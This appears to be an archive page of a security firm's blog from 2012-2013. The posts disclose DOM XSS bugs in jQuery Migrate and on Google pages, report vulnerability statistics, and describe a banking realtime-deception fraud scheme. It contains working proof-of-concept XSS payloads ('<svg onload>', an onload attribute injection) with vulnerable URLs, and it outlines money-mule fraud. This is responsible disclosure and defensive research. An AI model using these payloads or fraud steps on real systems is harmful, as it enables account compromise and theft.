Friday, October 18, 2013

DOMinatorPro with Martin Hall at London Tester Gathering Workshops 2013

Martin Hall will give a talk "Bug Hunting for Fun and Profit" at the London Tester Gathering Workshops 2013.

http://skillsmatter.com/event/agile-scrum/ltg-workshops

During his presentation Martin will show a demo of DOMinatorPRO Standard and you will have the chance to try our product.

Martin will be showing how you can have fun, gain fame and money finding issues in software and websites you use every day. He'll also be showing you some of the basic tips and techniques that will enable you to become a great "Bounty Hunter". 

More information here:
http://skillsmatter.com/podcast/agile-scrum/martin-hall

Martin Hall is a Senior SDET Lead at Microsoft (Skype Division)

Thank Martin for your support!

Friday, April 19, 2013

"jQuery Migrate" is a Sink, too?!

or How "jQuery Migrate" un-fixes a nasty DOMXSS without telling us..

Foreword

Today Mario Heiderich of Cure53 tweeted the following message:

"@0x6D6172696F Does anyone know why jquery.com has a special jQuery 1.9.1 version that is still vulnerable to $(location.hash)?"

What happened after that message might be considered to be the discovery of a rather interesting bug - which Mario and me will try to wrap up in this joint blog-post.

In short words:
an official jQuery plugin un-fixes a long-gone DOMXSS bug and brings it back - even on the jQuery homepage itself!

The Long Story

First, let's give the word to Mario and hear what he has to say:

"Some days ago, while being engaged in a workshop, I discovered a funny thing.
I visited the jQuery.com homepage and tried playing around with the DOMXSS jQuery came shipped with some months ago.
The one, that could be exploited by allowing arbitrary user input to the $() function - remember?
My goal was to demonstrate the attendees, how the XSS worked, why it worked and how it was fixed.

So, I wanted to test if there's still ways to activate it and get past the regular expression they installed to mitigate the bug. First thing was to try the obvious, set location.hash to <svg onload="alert(1)"> and execute $(location.hash) via the Firebug console expecting it NOT to work.
But.
It worked.
Admittedly confused, I checked the jQuery version they deployed and it was the latest - jQuery 1.9.1.
That couldn't be - I must have made something wrong!

I decided to build a small dynamic checker to see which exact version of jQuery is vulnerable to this bug, and which is not. The tool I created - really ugly code, be warned - is here.
It simply fetches all the jQuery versions from 1.3.0 up to 2.0.0 from the Google API, tests the vector via location.hash and then goes red or stays green depending on whether the code executed or not. As can clearly be seen:
jQuery 1.6.2 was the last vulnerable version. And 1.9.1 is not!



So, what did the jQuery people do? Why is their latest version vulnerable but the actual version isn't? How did they get their version to be buggy again? In my desperate helplessness I tweeted and Stefano replied. He found the cause for this quirky behaviour of eternal madness."

Now, Stefano (me:) had a deep look into the code and started the engine of... well, you know it, DOMinatorPro to see what kind of roguery is going on here.

"Since the day I started to develop DOMinatorPro and write DOMXSSWiki I thoroughly studied jQuery internals in its very own, so when Mario tweeted about that, I immediately thought about some weird misunderstood mixed jQuery version behaviour, as sometimes have happened to me.
Yet, here's the screen-shot:




..and the version info indeed clearly says: 1.9.1!!!
You can easily check that via $.expando by the way - no need to dig in the site sources or script code itself.
But, how's that possible?
Can DOMinatorPro help  me?
Let's see. By simply doing the same with DOMinatorPro, it will show the following alert:


The StackTrace says:

buildFragment(elems="#<s>sss", context="[object HTMLDocument]",scripts="undefined", selection="undefined")jquery-1.9.1.js (line 6481)

parseHTML
(data="#<s>sss", context="[object HTMLDocument]",keepScripts="true")jquery-1.9.1.js (line 521)

init(selector="#<s>sss", context="undefined", rootjQuery="[object Object]")jquery....1.0.js (line 213)

jQuery(selector="#<s>sss", context="undefined")jquery-1.9.1.js (line 48)


ParseHTML? No way! What are those files? Wait a moment, that jquery....1.0.js (line 213) is actually:
http://code.jquery.com/jquery-migrate-1.1.0.js !!
Let's see what's there:

var matched, browser,
 oldInit = jQuery.fn.init,
 oldParseJSON = jQuery.parseJSON,
 // Note this does NOT include the #9521 XSS fix from 1.7!
 rquickExpr = /^(?:[^<]*(<[\w\W]+>)[^>]*|#([\w\-]*))$/;

// $(html) "looks like html" rule change
jQuery.fn.init = function( selector, context, rootjQuery ) {
 var match;

 if ( selector && typeof selector === "string" && !jQuery.isPlainObject( context ) &&
   (match = rquickExpr.exec( selector )) && match[1] ) {
  // This is an HTML string according to the "old" rules; is it still?
  if ( selector.charAt( 0 ) !== "<" ) {
   migrateWarn("$(html) HTML strings must start with '<' character");
  }
  // Now process using loose rules; let pre-1.8 play too
  if ( context && context.context ) {
   // jQuery object as context; parseHTML expects a DOM object
   context = context.context;
  }
  if ( jQuery.parseHTML ) {
         return oldInit.call( this, jQuery.parseHTML( jQuery.trim(selector), context, true ),
 /* Vuln Call Here !! -^*/  context, rootjQuery );
  }
 }
 return oldInit.apply( this, arguments );
};
jQuery.fn.init.prototype = jQuery.fn; 

So, by looking at the oldInit.call what happens here is that another jQuery sink is called (!) and that's jQuery.parseHTML."

Why is that?

It's probably a way to give back compatibility by recreating the old behavior using parseHTML, but jQuery guys forgot that there are two fixes that try to patch a wrong design choice, and the first one comes from Version > 1.6.2. These include the dreaded DOMXSS from Mala.
 
Can it be worked around? 

Mario wrote this quick and - as he calls it himself - incredibly dirty fix, which will address the unexpected abuse of this classical pattern:

function jQMfix(){      if(/</.test(location.hash)) {           location.hash=location.hash.replace(/</g,'')      } }
onhashchange=jQMfix; jQMfix();

The  fix is - and that is Mario speaking again - extremely dirty and everything but production ready.
But it shows a way to make sure the location.hash cannot be abused to cause DOMXSS on your precious website.
If your JavaScript is.. "special" it can of course still happen.

But you get the gist - make sure that if you use the jQuery Migration plugin that your web-app stays safe from DOMXSS.

Here's yet another way to approach it, from Stefano, but keep in mind that it's completely untested and more an example on how to approach it:

jQuery = $ =( function (r) {return function jQuery(a,b){
  if(a.charAt(0)==='#') 
    a=a.replace(/</g,'')
  r.apply(null,[a,b])
 }
} )(jQuery)
..and, of course, feel free to improve it and paste it in a comment.

We do see a lot of plugin-caused DOMXSS in the wild - but a plugin that purposely un-fixes an existing and well-known XSS bug? That's something :-)

Also, greetings to the fellow attendees of the jQuery UK conference that is happening right now.

Have a beautiful (0-)day! :)

Tuesday, February 19, 2013

Real Life Vulnerabilities Statistics: an overview


From time to time, it is useful for a consulting company like us to stop, look back and think about what has been done in the last few years. This is important because:
  • the company can identify the categories where internal skills need to be improved;
  • the company is able to know in advance which areas are more flawed for specific customers. 
In addition to these considerations, we thought that these data would have been useful for the new release of the OWASP Top Ten project

For this reason, we collected all our reports from 2010 until 2012 and performed a statistical analysis that, in conjunction with other contributors' results, will help the new OWASP Top Ten to better fit these times and to keep track of differences from previous versions.

We started the analysis by splitting vulnerabilities in two main categories:
  • Web Application Penetration Test (WAPT)
  • Secure Code Review (SCR). 
The following histograms are the result of counting the occurrences of each vulnerability ordered by frequency and shown in percentage.

SCR vulnerabilities percentage

WAPT vulnerabilities percentage

We think this can help to understand how the results presented from the OWASP Top Ten 2013 were obtained. Also it is an overview of what we find during our consulting assessments. 

Finally, to give more expressiveness to these data, here are them according to their testing category (as described in the OWASP Tesing Guide) in order to know which areas are more vulnerable:

SCR areas of analysis percentage

WAPT areas of analysis percentage



Thursday, February 14, 2013

Discretionary Controls and Realtime Deception Attacks


Nowadays banking authentication systems are getting more and more sophisticated in order to counterattack the increasing number of hack attempts, but unfortunately attackers follow the same trend by forging new and more refined attack systems, we can define this as a classical never ending battle between good and evil forces.
 
In this blog post we will talk about the threats posed by the lack application of the proper standard (ISO 15022, 8583) which regulates controls on banking transaction details.

We can summarize this lack of standard with the following statement: “Banking transactions details are checked discretionally by the receiving institute”.

An in depth view of Discretionary Controls could be checked here [1].
The immediate effect of this behavior is that an attacker could choose a bank with weak controls to commit fraudulent transactions.

In this post we describe a scenario where an attacker takes advantage of a bank accepting incoming wire transfers omitting the surname of the recipients. Too many financial institutes allow incoming wire-transfers to "Giorgio" instead to "Giorgio Rossi" as a recipient.


The immediate effect of this behavior is that an attacker could choose a bank with weak controls to commit fraudulent transactions.

 Another very important consequence of a weak control on transaction details is that it could disrupt the effectiveness of authentication mechanisms especially transaction detail verification ones because is possible to accomplish Social Engineering attacks, for example on the recipient Name.

More details will be given in a
specific paragraph that will clarify how discretionary controls could be abused. To clarify the whole attack process let's clarify what is an OOB authentication system.


Overview of OOB Transaction Detail Verification devices


 
The OOB (Out-Of-Band) Transaction Detail Verification authentication system sends to the banking customer a set of details about the transaction that he should approve. Those details could be for example Iban, Amount, Recipient, Country, if the requested transaction matches the expectation of the customer (seems legitimate) he will validate the transfer by generating an OTP code.

Follows an example of a typical transaction detail verification hardware device:


If the transaction is correct, the user will validate it by generating an OTP code to finalize the operation.

Let’s see how an attacker could abuse the weaknesses in deriving from discretionary controls in realtime thanks to the technology offered by the most modern banking malware.

The first step is to clarify what is a realtime-deception attack and how is accomplished.


ATS and Realtime Deception Attacks

Most modern malware banking implements a webinjection technology called ATS [2] which stands for Automatic Transfer System. Thanks to the ATS system attackers could automatically commit fraudulent transactions or modify and substitute in realtime sensitive details like Iban and Recipient of a legit transaction requested by the victim with malicious detail one.

A realtime-deception attack creates a condition, in which the victim is convinced to authorize a legitimate transaction, when in fact will be validating the fraudulent transaction desired by the attacker.  


Realtime-Deception applied to Discretionary Controls


The following picture summarizes the attack process:

It’s clear that a realtime-deception attack could be a serious threat if applied to a bank that implements weak discretionary controls.


  1. First step involves in the infection of the victim with a banking malware which supports MiTB (Man in The Middle) and makes use of ATS technology.
  2. When the victim fills details to commit a legitimate transaction, the webinjection will substitute the proper Iban and other details, with a malicious ones owned by the attacker. The attacker automatically chooses thanks to ATS the proper money-mule to adopt, in the case of the example Giorgio “Mule”. Attackers needs a mule with the same name (not surname) of the intended recipient chosen by the user.
The victim will receive in the OTP device details about the transaction, but will hardly notice the change of the Iban code, so finally the victim is convinced to validate your transaction. OTP will also provide the code necessary to validate the fraudulent transaction.

Realtime-Deception attacks are suitably constructed according to the device and transaction details exposed to the victim.

However it’s possible to provide a categorization of the possible combinations of detail alteration and relative weak discretionary control that could lead to a successful attack. This combination involves the security design of the OOB device screen:
  1. Substitution of Recipient, Iban and Amount – This substitution could be used for example against phone call authentication which does not reveal transaction details.
  2. Substitution of Recipient and Iban – This substitution could work for example against devices that does not show the Name between transaction details.
  3. Substitution of Recipient’s Name and deletion of the Surname – This substitution could work for example against devices that only show only the Recipient Name.
Let’s suppose for example that we are in the third case, the hardware device shows only Amount and Name and let’s also suppose that the banking transaction detail controls does not care about the recipient Surname.
An attacker could exploit this flaw to substitute for example
The ATS automatically chooses the best fitting money-mule, in this case the mule has the same name of the legitimate recipient, the Surname difference is rendered useless due to the nature of this specific control weakness: example Giorgio (Real) -> Giorgio (Mule).
Where “Giorgio Mule” is a money-mule owned by the attacker.
From a victim point of view would be impossible to distinguish Giorgio “Real” from “Mule”, this behavior will finally lead the customer to validate the fraudulent transaction.

The scope of this simple attack scenario is to show that it’s possible to meet a specific banking institute which has poor controls, for example by allowing transactions that contains a wrong beneficiary name. For an attacker will be an easy task to change Iban code and leave the same recipient name.

Each kind of substitution/modification typology strictly depends on the weak discretionary control applied by the specific bank.

It’s interesting to put in evidence the fact that a correct mix of Social Engineering, webinjection capabilities and knowledge of the details validation flaws could pose a serious threat for the vast majority (hardware and software) of OOB transaction detail verification authentication systems.

From a defense point of view became clear that adopting the proper transaction detail verification standards [3] [4] represents a significant increase in terms of security.

Written by Giorgio Fedon and Giuseppe BonfĂ 

References:

Thursday, November 8, 2012

DOMinatorPro Fuzzer finds a DOM XSS on Google.com

Introduction a.k.a. tl;dr


A quite simple DOM Based XSS was found on https://www.google.com/ context using DOMinatorPro.
What I think it's interesting here, is to show how DOMinatorPro works in this real world case.

In order to give a more detailed description, i recorded a video (HD) to show how DOMinatorPro can help in finding those particular kind of issues.




Some Details

DOMinatorPro is a runtime JavaScript DOM XSS analyzer, which means it can check for complex filters and help in finding debug and/or unreferenced parameters during JavaScript execution.

In order to do that, DOMinatorPro exposes a fuzzer button which fuzzes the URL query string and html input elements that have keyboard events attached to them as shown in the youtube video.
By using that feature I found that the code in
http://www.googleadservices.com/pagead/landing.js
uses unvalidated input to build the argument for two document.write call.

This javascript is used, among others, by:
http://www.google.com/toolbar/ie/index.html
and
https://www.google.com/toolbar/ie/index.html
which means that one more time a (almost) 3rd party script introduces a flaw in the context of an unaware domain.

Source Analysis

From http://www.googleadservices.com/pagead/landing.js (which has now been removed) the following lines do not escape user input:

Line 53:
    if (w.google_conversion_ad) {
      url = url + "&gad=" + w.google_conversion_ad;
    }
    if (w.google_conversion_key) {
      url = url + "&gkw=" + w.google_conversion_key;
    }
    if (w.google_conversion_mtc) {
      url = url + "&gmtc=" + w.google_conversion_mtc;
    }
    if (w.google_conversion_raw) {
      url = url + "&graw=" + w.google_conversion_raw;
    }
    if (w.google_conversion_domain) {
      url = url + "&dom=" + w.google_conversion_domain;
    }
   
And those values are taken by using :
function google_get_param(url, param) {
var i;
var val;
if ((i = url.indexOf("?" + param + "=")) > -1 ||
(i = url.indexOf("?" + param.toUpperCase() + "=")) > -1 ||
(i = url.indexOf("&" + param + "=")) > -1 ||
(i = url.indexOf("&" + param.toUpperCase() + "=")) > -1) {
val = url.substring(i + param.length + 2, url.length);
if ((i = val.indexOf("&")) > -1) {
val = val.substring(0, i);
}
}
return val;
}
...
google_conversion_ad = google_get_param(url, "gad");
if (window.google_conversion_ad) {
(google_conversion_key = google_get_param(url, "gkw")) ||
(google_conversion_key = google_get_param(url, "ovkey"));
google_conversion_mtc = google_get_param(url, "ovmtc");
google_conversion_raw = google_get_param(url, "ovraw");
}
}

After the previous code, the url variable is used on line 91:

document.write('' name="google_conversion_frame"' +
' width="' + width + '"' +
' height="' + height + '"' +
' src="' + url + '"' +
' frameborder="0"' +
' marginwidth="0"' +
' marginheight="0"' +
' vspace="0"' +
' hspace="0"' +
' allowtransparency="true"' +
' scrolling="no">');

and line 103:

document.write(''src="' + url + '&ifr' + 'ame=0"' +
' />');
so the offending url (which can be found with DOMinatorPro fuzzer), is:

http://www.google.com/toolbar/ie/index.html?&gad=bbbb&gkw=yyyy&ovkey=10101010&ovmtc=14141414&ovraw=18181818&

and on any of those parameters can be added an attack payload like:

AAAA"onload="alert(document.domain)"

Remediation

I suggested that the use of encodeURIComponent on user data
    if (w.google_conversion_ad) {
      url = url + "&gad=" + encodeURIComponent(w.google_conversion_ad);
    }
    if (w.google_conversion_key) {
      url = url + "&gkw=" +
encodeURIComponent(w.google_conversion_key);
    }
    if (w.google_conversion_mtc) {
      url = url + "&gmtc=" +
encodeURIComponent(w.google_conversion_mtc);
    }
    if (w.google_conversion_raw) {
      url = url + "&graw=" +
encodeURIComponent(w.google_conversion_raw);
    }
    if (w.google_conversion_domain) {
      url = url + "&dom=" +
encodeURIComponent(w.google_conversion_domain);
    }

would have solved the problem.

Anyway, Google fixed that by removing that script for good, which is a solution as well! :)

Conclusions 

As already said in my previous post, I still see DOM based XSS all around with little awareness and difficulties by all actors in SDLC in identifying them.
DOMinatorPro can really help in finding DOM based XSS and it does that by helping testers, developers or QA users by trying to give the information they need by adapting to the knowledge they have.

Give DOMinatorPro a Try

Do you still trust all those 3rd party JavaScripts embedded in your pages ?
Just browse your site with DOMinatorPro or fuzz your pages and see what happens. :)
In case you need help, check out our professional services or just ask for a contact.

Monday, November 5, 2012

DOM XSS on Google Plus One Button

Introduction

DOMinatorPro can be very useful to find DOM Based XSS on complex JavaScript web applications. This post will describe a Cross Origin Resource Sharing (CORS) abuse exploiting a flaw in the JavaScript Plus One code on plus.google.com.
Just to be clear, yes, it's the +1 button present on billions of pages around the internet.
The issue affected the context of https://plus.google.com which is the context of the social network.

Before going further with any details, a picture is worth a thousand words:



In order to better explain the issue and show how DOMinatorPro helped me in finding the problem, and since a video is worth a thousand pictures, I recorded a video on Youtube MindedSecurity channel.






In the video I deliberately chose to not show a single line of JavaScript in order to demonstrate what DOMinatorPro can do for a tester with little knowledge of JavaScript.

In this post, on the other hand, I'd like to discuss about how the input was treated and how Google fixed the issue with input validation.

Code Issue Details

The offending URL in a simplified version was:
https://plusone.google.com/_/+1/fastbutton?url=http://www.example.com&ic=1&jsh=m;/_/apps-static/_/js/gapi/__features__/rt=j/ver=ZZZZ/sv=1/am=!YYYY/d=1/rs=XXX

First of all, a throw "Bad URL " exception can be spotted on line 425, which actually controls for the presence of multiple callbacks (/cb=/) in 'l' variable and  for the presence of classic  /[@"'<>#\?&%]/ metacharacters in 'ga'. If some of those conditions are satisfied then an exception (Bad URL) is thrown. 
That is called data validation.
 
420 d = m.split(";");
421 d = (i = M[d.shift()]) &&  i(d);
422 if (!d) throw "Bad hint:" + m;
423 i = d = d[q]("__features__", T(r))[q](/\/$/, "") + 
                   (e[s] ? "/ed=1/exm=" + T(e) : "")
                   + ("/cb=gapi." + J);
424 l = i.match(ha); // "https://apis.google.com/TAINTED/cb=gapi.loaded_0".match(/\/cb=/g)
425 if (!l || !(1 === l[s] && 
                 ga[p](i) && !fa[p](i)))
                      throw "Bad URL " + d;
426 e[k].apply(e, r);
427 L("ml0", r, I);
428 c[R.f] || t.___gapisync ?
     (c = d, "loading" != u.readyState ? 
     W(c) :
     u.write("<" + S + ' src="' + encodeURI(c) + '"></' + S + ">")) :
     W(d, c, J) 
....

Line 428 is the call to the function that performs a XMLHttpRequest. By following the flow on Line 532 (beautified) the 'l' variable is tainted and it's the one that is traced by DOMinatorPro, originating by the location.href jsh parameter:

starting from: jsh=m;/_/apps-static/_/js/gapi/....

becomes "https://apis.google.com/_/apps-static/_/js/gapi/..../cb=gapi.loaded_0" and l[q] is the replace function :

function W(){
...
531 a = v.XMLHttpRequest,
532 l = l[q](/^https?:\/\/[^\/]+\//, "/"), 
533 m = new a;
534 m.open("GET", l, f)
...
}
So on line 532 https://apis.google.com/ is removed and 'l' becomes:

"/_/apps-static/_/js/gapi/..../cb=gapi.loaded_0"

The reason why there is execution is that the response is evaluated using the following code:

B=function(a,b,c){v.execScript?v.execScript(b,"JavaScript"):c?a.eval(b):
 (a=a.document,c=a.createElement("script"),c.defer=i,
 c.appendChild(a.createTextNode(b)...
Now, about the fix, I suggested Google to perform some input validation using A tag properties,
var aa=document.createElement("a");
aa.href=untrustedURL;

and then use aa.pathname to be sure it's the browser doing the parsing job but probably it does not work perfectly for all browsers.

In fact Google devs decided to add more data validation

if (!l || !(1 === l[v] && ha[q](d) && 
            ga[q](d) && h && 1 === h[v]))
  throw "Bad URL " + a;
that code changes one check and adds another condition, to the previous one we already discussed.
In particular:
 
ga[q](d) changes from /[@"'><#\?&%]/ (blacklist) 
                 to  /^[\/_a-zA-Z0-9,.\-!:=]+$/ (whitelist)
 
And  
1 === h[v] has been added and means if there is 
            only one "//"  (like http://  )
Which seems pretty solid to me, at least in the context of this specific issue; of course, bypasses are always around the corner, but I'm sure Google security guys took the best effort to be sure it's safe!

Conclusions

DOM Based XSS still remains quite untested, and that's because JavaScript is not easy to analyze in complex scenarios.
DOMinatorPro can really help in finding issue in the easy-to-hard-to-identify range of DOM Based XSS category, because DOMinatorPro is not as simple as you might think, it's a complex piece of software and with a large knowledge base in it.

Tuesday, October 9, 2012

Stored DOM Based Cross Site Scripting

Since the very first release of DOMinatorPro, there is an 'S' little button in the right down corner:


Q: What does it mean?
A: First of all, I'd say, it actually means that there's another feature that makes DOMinatorPro a bleeding edge tool for finding DOM Based XSS :).

The Stored Strings tainting is a very interesting feature that DOMinatorPro implements for tracking stored DOM Based Cross Site Scripting issues.

Think about the following scenery.

Pseudo code:
  setName.do
String name=getFromParameter("name"); saveOnDB(name);
  getName.do
String name = getNameFromDB(); // escape the source (name) from DB so no stored XSS is there String jsEscape=encodeForJavaScript(name); print "<script>\n"; // No problem here since it's escaped. print "var aname='({\"aName\":\""+jsEscape+"\"})';"; print "eval(aname);\n"; print "</script>";
So we'll get in the getName.do page :
.. <script> var aname='({"aName":"PATTERN"})'; eval(aname); </script> ..
At this point you surely understand the issue in the flow:

Step 1. Attacker sends name=PATTERN

  

Step 2. Victim visits a page with the flawed Js.




The attacker can't directly get out from the string since it's supposed to be correctly escaped, so that a payload like name=testPATTERN"'> will become:

var aName="testPATTERN\x22\x27\x3c"; ..
Which is not directly exploitable, but if that same variable is used as argument for a Function or eval, or innerHTML or some of the sinks described on DOMXSS Wiki (contribute please), then it's an exploitable issue.

No existing tool is able to trace patterns like that during JavaScript execution but DOMinatorPro.
What the tester has to do is to turn on tainting on Stored Strings and set the pattern which has to be traced using the settings:


Finally, the user will just have to create the scenario by browsing the application with DOMinatorPro.
And she'll get some output like the following:


Where StoredTainted is the constant string transformed as tainted on the fly.

There are several interesting possibilities by using the tainted stored strings, like applying the same checks on responses from XMLHttpRequests.
But that's food for another blog post.

Feedbacks  are, as usual really welcome!

Ps. If you're a licensed user remember to update the DOMinatorPro Extension to the latest one from your dominator downloads page.